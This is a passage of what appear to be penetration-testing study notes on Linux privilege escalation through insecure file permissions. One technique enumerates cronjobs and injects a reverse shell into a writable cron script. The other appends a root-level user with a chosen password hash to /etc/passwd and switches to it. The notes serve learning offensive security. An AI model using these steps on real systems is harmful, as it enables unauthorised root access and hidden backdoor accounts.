5. Insecure File Permissions

Abusing Cronjobs

1. Enumerate cronjobs:

# Cronjobs for all users
ls -lah /etc/cron*

#User-created cronjobs for the current user
crontab -l

#Running cronjobs:
grep "CRON" /var/log/syslog
cat /var/log/cron.log

2. Inspect running script:

cat /home/joe/.scripts/user_backups.sh

3. Edit script to add reverse shell. Win!

Abusing /etc/passwd

• Historically hashes could be stored alongside user information in /etc/passwd
• If one can edit /etc/passwd a hash can be placed for a user it takes precedence over /etc/shadow, hence arbitrary password and user change

1. Generate password hash:

openssl passwd <arbitrarypassword>

2. Echo the hash plus user info into /etc/passwd:

echo "<username>:<hash>:0:0:root:/root:/bin/bash" >> /etc/passwd

3. Switch user to your new user and provide the password:

su <newuser>

4. Win!